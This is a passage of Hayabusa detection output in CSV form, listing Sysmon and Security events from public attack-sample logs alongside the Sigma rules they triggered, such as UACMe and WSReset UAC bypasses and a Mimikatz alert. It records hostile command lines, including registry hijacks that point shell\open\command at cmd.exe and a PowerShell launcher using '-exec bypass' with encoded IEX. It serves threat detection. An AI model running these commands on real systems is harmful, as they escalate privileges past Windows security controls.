MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 41 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:30.389 
+09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 43 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040 : Path: C:\Windows\System32\consent.exe : 
User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys 
Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe"" : Path: C:\Windows\System32\changepk.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey : Path: C:\Windows\System32\SystemSettingsAdminFlows.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" 
-ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 53 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.409 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.972 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 
c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 56 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d 
""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x38f87e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command 
Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than 